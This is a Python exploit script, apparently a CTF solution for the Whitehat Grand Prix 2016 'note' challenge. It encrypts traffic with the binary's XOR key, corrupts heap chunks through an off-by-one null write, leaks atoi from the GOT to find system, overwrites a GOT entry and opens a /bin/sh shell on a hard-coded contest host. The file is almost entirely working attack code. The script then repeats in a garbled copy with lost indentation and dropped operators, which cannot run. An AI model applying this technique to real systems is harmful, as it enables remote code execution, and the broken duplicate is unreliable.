peternguyen93/note_pwn500_grandprix_2016.py

## note_pwn500_grandprix_2016.py
#Pwn 500 WhitehatGrangrix 2016
from Pwn import *

# p = Pwn(elf='./note')
p = Pwn(elf='./note',host='118.70.186.203',port=23501)

key_1 = [
	0xd49f6a35,0xa8733e09,0x7c4712dd,0x501be6b1,
	0x24efba85,0xf8c38e59,0xcc97622d,0xa06b3601,
	0x743f0ad5,0x4813dea9,0x1ce7b27d,0xf0bb8651,
	0xc48f5a25,0x98632ef9,0x6c3702cd,0x400bd6a1,
	0x14dfaa75,0xe8b37e49,0xbc87521d,0x905b26f1,
	0x642ffac5,0x3803ce99,0x0cd7a26d,0xe0ab7641,
	0xb47f4a15,0x88531ee9,0x5c27f2bd,0x30fbc691,
	0x04cf9a65,0xd8a36e39,0xac77420d,0x004b16e1,
	0x00000000,0x00000000,0x00000000,0x00000000,
	0x00000000,0x00000000,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x0a202020,0x6d202020,0x20206d6d,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202320,0x6d6d6d6d
]

key = [p.p32(l) for l in key_1]
# key = [p.p32(l) for l in key]
key = ''.join(key)
key = [ord(c) for c in key]

def decrypt(data):
	data = data.decode('hex')
	data = [ord(c) for c in data]
	for i in xrange(0,len(data)):
		if data[i] <= 0x7f:
			t = 0
		else:
			t = 0x80
		c = key[(i % 128) + t] ^  data[i]
		if data[i] <= 0x7f:
			c = c % 128
		data[i] = c

	return ''.join([chr(c % 256) for c in data])

def encrypt(data):
	if len(data) == 0:
		return ''

	data = [ord(c) for c in data]

	for i in xrange(0,len(data)):
		if data[i] <= 0x7f:
			t = 0
		else:
			t = 0x80
		c = key[(i % 128) + t] ^ data[i]
		if data[i] <= 0x7f:
			c = c % 128
		data[i] = c

	return ''.join([chr(c % 256) for c in data]).encode('hex').upper()

cmd = encrypt('cmd #:')
size_note = encrypt('Enter size Note #: ')
name_note = encrypt('Name Note #:')
data_note = encrypt('Date #: ')
body_note = encrypt('Body #: ')
index_free = encrypt('Index Free#: ')
index_read = encrypt('Index #:')
index_edit = encrypt('Index Edit#:')

def list_note():
	p.read_until(cmd)
	p.sendline(encrypt('list'))

	out = p.read_until(cmd)
	p.sendline('\n')
	out = out.split('\n')
	output = ''
	for o in out:
		output += decrypt(o)
	return output

def read_note(idx):
	p.read_until(cmd)
	p.sendline(encrypt('read'))
	p.read_until(index_read)
	p.sendline(encrypt(str(idx)))

	out = p.read_until(cmd)
	p.sendline('\n')
	out = out.split('\n')
	output = ''
	for o in out:
		output += decrypt(o)
	return output

def free_note(idx):
	p.read_until(cmd)
	p.sendline(encrypt('free'))
	p.read_until(index_free)
	p.sendline(encrypt(str(idx)))

def add_note(name,date,body,size):
	p.read_until(cmd)
	p.sendline(encrypt('add'))
	p.read_until(size_note)
	p.sendline(encrypt(str(size)))
	p.read_until(name_note)
	p.sendline(encrypt(name))
	p.read_until(data_note)
	p.sendline(encrypt(date))
	p.read_until(body_note)
	p.sendline(encrypt(body))

def edit_note(idx,name,date,body):
	p.read_until(cmd)
	p.sendline(encrypt('edit'))
	p.read_until(index_edit)
	p.sendline(encrypt(str(idx)))
	p.read_until(name_note)
	p.sendline(encrypt(name))
	p.read_until(data_note)
	p.sendline(encrypt(date))
	p.read_until(body_note)
	p.sendline(encrypt(body))

def exploit():
	p.connect()

	add_note('A'*30,'C'*15,'D'*76,76)
	add_note('E'*30,'F'*15,'G'*460 + p.pack(0x41),464)
	add_note('F'*30,'Q'*15,'K'*208,208)
	add_note('T'*30,'M'*15,'K'*208,208)
	stage = 'D'*40 + p.pA(0,0x89)
	stage+= 'D'*4 + p.pack(0x804f6a0 - 8) #fake chunk->bck
	add_note('A'*30,'C'*15,stage,56)
	add_note('W'*30,'F'*15,'C'*79 + '\n',80)
	add_note('T'*30,'M'*15,'K'*208,208)

	free_note(1)
	edit_note(0,'A'*30,'C'*15,'K'*44) # overwrite note[1]->size

	add_note('T'*30,'F'*15,'C'*320,320)
	add_note('Y'*30,'F'*15,'C'*79 + '\n',80)

	free_note(1)
	free_note(2)

	stage1 = 'A'*320
	stage1+= p.pA(0,0x89)
	stage1+= 'A'*4 + 'C'*4
	stage1+= 'P'*(0x88 - 16)
	stage1+= p.pA(0,0x81)
	stage1 = stage1.ljust(464,'\xC0')
	add_note('E','F'*15,stage1,464) # overwrite note 7
	add_note('T'*30,'M'*15,'K'*208,208)

	free_note(7)
	free_note(5)

	# print list_note()
	stage1 = 'A'*320
	stage1+= p.pA(0,0x89) + 'A'*4 + '\n'
	edit_note(1,'X'*30,'Z'*15,stage1) # off byte null overwrite chunk->bck
	# after this add, notes->list = main_arena->bins 5 or 6
	add_note('K'*30,'F'*15,'C'*79 + '\n',80)

	stage3 = 'A'*4
	stage3+= p.pA(
		1,
		32,
		p.got['atoi'],
		1,
		32,
		p.got['strcspn']
	)
	stage3 = stage3.ljust(79,'C')
	add_note('A'*30,'F'*15,stage3 + '\n',80)

	out = read_note(11)
	idx = out.find('\xf7')
	atoi = p.unpack(out[idx - 3:idx + 1])
	system = atoi - p.get_libc_offset(atoi,'atoi')
	print hex(atoi)
	print hex(system)

	p.read_until(cmd)
	p.sendline(encrypt('edit'))
	p.read_until(index_edit)
	p.sendline(encrypt(str(12)))
	p.read_until(name_note)
	payload = p.pack(system) + '\n'
	p.sendline(encrypt(payload))
	p.read_until(data_note)
	p.sendline('/bin/sh')

	p.io()

exploit()
	#Pwn 500 WhitehatGrangrix 2016
	from Pwn import *

	# p = Pwn(elf='./note')
	p = Pwn(elf='./note',host='118.70.186.203',port=23501)

	key_1 = [
	0xd49f6a35,0xa8733e09,0x7c4712dd,0x501be6b1,
	0x24efba85,0xf8c38e59,0xcc97622d,0xa06b3601,
	0x743f0ad5,0x4813dea9,0x1ce7b27d,0xf0bb8651,
	0xc48f5a25,0x98632ef9,0x6c3702cd,0x400bd6a1,
	0x14dfaa75,0xe8b37e49,0xbc87521d,0x905b26f1,
	0x642ffac5,0x3803ce99,0x0cd7a26d,0xe0ab7641,
	0xb47f4a15,0x88531ee9,0x5c27f2bd,0x30fbc691,
	0x04cf9a65,0xd8a36e39,0xac77420d,0x004b16e1,
	0x00000000,0x00000000,0x00000000,0x00000000,
	0x00000000,0x00000000,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x0a202020,0x6d202020,0x20206d6d,
	0x20202020,0x20202020,0x20202020,0x20202020,
	0x20202020,0x20202020,0x20202320,0x6d6d6d6d
	]

	key = [p.p32(l) for l in key_1]
	# key = [p.p32(l) for l in key]
	key = ''.join(key)
	key = [ord(c) for c in key]

	def decrypt(data):
	data = data.decode('hex')
	data = [ord(c) for c in data]
	for i in xrange(0,len(data)):
	if data[i] <= 0x7f:
	t = 0
	else:
	t = 0x80
	c = key[(i % 128) + t] ^ data[i]
	if data[i] <= 0x7f:
	c = c % 128
	data[i] = c

	return ''.join([chr(c % 256) for c in data])

	def encrypt(data):
	if len(data) == 0:
	return ''

	data = [ord(c) for c in data]

	for i in xrange(0,len(data)):
	if data[i] <= 0x7f:
	t = 0
	else:
	t = 0x80
	c = key[(i % 128) + t] ^ data[i]
	if data[i] <= 0x7f:
	c = c % 128
	data[i] = c

	return ''.join([chr(c % 256) for c in data]).encode('hex').upper()

	cmd = encrypt('cmd #:')
	size_note = encrypt('Enter size Note #: ')
	name_note = encrypt('Name Note #:')
	data_note = encrypt('Date #: ')
	body_note = encrypt('Body #: ')
	index_free = encrypt('Index Free#: ')
	index_read = encrypt('Index #:')
	index_edit = encrypt('Index Edit#:')

	def list_note():
	p.read_until(cmd)
	p.sendline(encrypt('list'))

	out = p.read_until(cmd)
	p.sendline('\n')
	out = out.split('\n')
	output = ''
	for o in out:
	output += decrypt(o)
	return output

	def read_note(idx):
	p.read_until(cmd)
	p.sendline(encrypt('read'))
	p.read_until(index_read)
	p.sendline(encrypt(str(idx)))

	out = p.read_until(cmd)
	p.sendline('\n')
	out = out.split('\n')
	output = ''
	for o in out:
	output += decrypt(o)
	return output

	def free_note(idx):
	p.read_until(cmd)
	p.sendline(encrypt('free'))
	p.read_until(index_free)
	p.sendline(encrypt(str(idx)))

	def add_note(name,date,body,size):
	p.read_until(cmd)
	p.sendline(encrypt('add'))
	p.read_until(size_note)
	p.sendline(encrypt(str(size)))
	p.read_until(name_note)
	p.sendline(encrypt(name))
	p.read_until(data_note)
	p.sendline(encrypt(date))
	p.read_until(body_note)
	p.sendline(encrypt(body))

	def edit_note(idx,name,date,body):
	p.read_until(cmd)
	p.sendline(encrypt('edit'))
	p.read_until(index_edit)
	p.sendline(encrypt(str(idx)))
	p.read_until(name_note)
	p.sendline(encrypt(name))
	p.read_until(data_note)
	p.sendline(encrypt(date))
	p.read_until(body_note)
	p.sendline(encrypt(body))

	def exploit():
	p.connect()

	add_note('A'30,'C'15,'D'*76,76)
	add_note('E'30,'F'15,'G'*460 + p.pack(0x41),464)
	add_note('F'30,'Q'15,'K'*208,208)
	add_note('T'30,'M'15,'K'*208,208)
	stage = 'D'*40 + p.pA(0,0x89)
	stage+= 'D'*4 + p.pack(0x804f6a0 - 8) #fake chunk->bck
	add_note('A'30,'C'15,stage,56)
	add_note('W'30,'F'15,'C'*79 + '\n',80)
	add_note('T'30,'M'15,'K'*208,208)

	free_note(1)
	edit_note(0,'A'30,'C'15,'K'*44) # overwrite note[1]->size

	add_note('T'30,'F'15,'C'*320,320)
	add_note('Y'30,'F'15,'C'*79 + '\n',80)

	free_note(1)
	free_note(2)

	stage1 = 'A'*320
	stage1+= p.pA(0,0x89)
	stage1+= 'A'4 + 'C'4
	stage1+= 'P'*(0x88 - 16)
	stage1+= p.pA(0,0x81)
	stage1 = stage1.ljust(464,'\xC0')
	add_note('E','F'*15,stage1,464) # overwrite note 7
	add_note('T'30,'M'15,'K'*208,208)

	free_note(7)
	free_note(5)

	# print list_note()
	stage1 = 'A'*320
	stage1+= p.pA(0,0x89) + 'A'*4 + '\n'
	edit_note(1,'X'30,'Z'15,stage1) # off byte null overwrite chunk->bck
	# after this add, notes->list = main_arena->bins 5 or 6
	add_note('K'30,'F'15,'C'*79 + '\n',80)

	stage3 = 'A'*4
	stage3+= p.pA(
	1,
	32,
	p.got['atoi'],
	1,
	32,
	p.got['strcspn']
	)
	stage3 = stage3.ljust(79,'C')
	add_note('A'30,'F'15,stage3 + '\n',80)

	out = read_note(11)
	idx = out.find('\xf7')
	atoi = p.unpack(out[idx - 3:idx + 1])
	system = atoi - p.get_libc_offset(atoi,'atoi')
	print hex(atoi)
	print hex(system)

	p.read_until(cmd)
	p.sendline(encrypt('edit'))
	p.read_until(index_edit)
	p.sendline(encrypt(str(12)))
	p.read_until(name_note)
	payload = p.pack(system) + '\n'
	p.sendline(encrypt(payload))
	p.read_until(data_note)
	p.sendline('/bin/sh')

	p.io()

	exploit()